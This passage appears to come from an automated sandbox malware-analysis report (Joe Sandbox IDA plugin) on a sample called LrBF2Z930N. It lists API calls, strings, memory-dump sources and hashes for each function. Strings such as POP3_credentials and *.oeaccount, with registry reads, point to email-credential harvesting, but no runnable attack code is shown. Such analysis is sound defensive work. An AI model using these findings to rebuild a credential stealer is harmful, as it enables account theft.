                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                      • API String ID: 643879872-978417875
                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4281309102-0
                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                      APIs
                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 1631269929-4153097237
                                                                                      • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                      • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                      • API String ID: 524865279-2190619648
                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2300387033-3849865405
                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                      • String ID: %s (%s)
                                                                                      • API String ID: 3756086014-1363028141
                                                                                      • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                      • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                      APIs
                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                      Strings
                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                      • API String ID: 1640410171-3316789007
                                                                                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 125969286-791839006
                                                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                      APIs
                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                      • String ID: ACD
                                                                                      • API String ID: 1886237854-620537770
                                                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                      • String ID: caption$dialog_%d
                                                                                      • API String ID: 2923679083-4161923789
                                                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                      Strings
                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                      • unknown error, xrefs: 004277B2
                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                      • API String ID: 3510742995-3035234601
                                                                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                      • API String ID: 2221118986-3608744896
                                                                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmpmemcpy
                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                      • API String ID: 1784268899-4153596280
                                                                                      • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                      • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                      • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                      • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                      • memset.MSVCRT ref: 00410246
                                                                                      • memset.MSVCRT ref: 00410258
                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3974772901-0
                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 577244452-0
                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                      APIs
                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                      • String ID: imap$pop3$smtp
                                                                                      • API String ID: 2025310588-821077329
                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
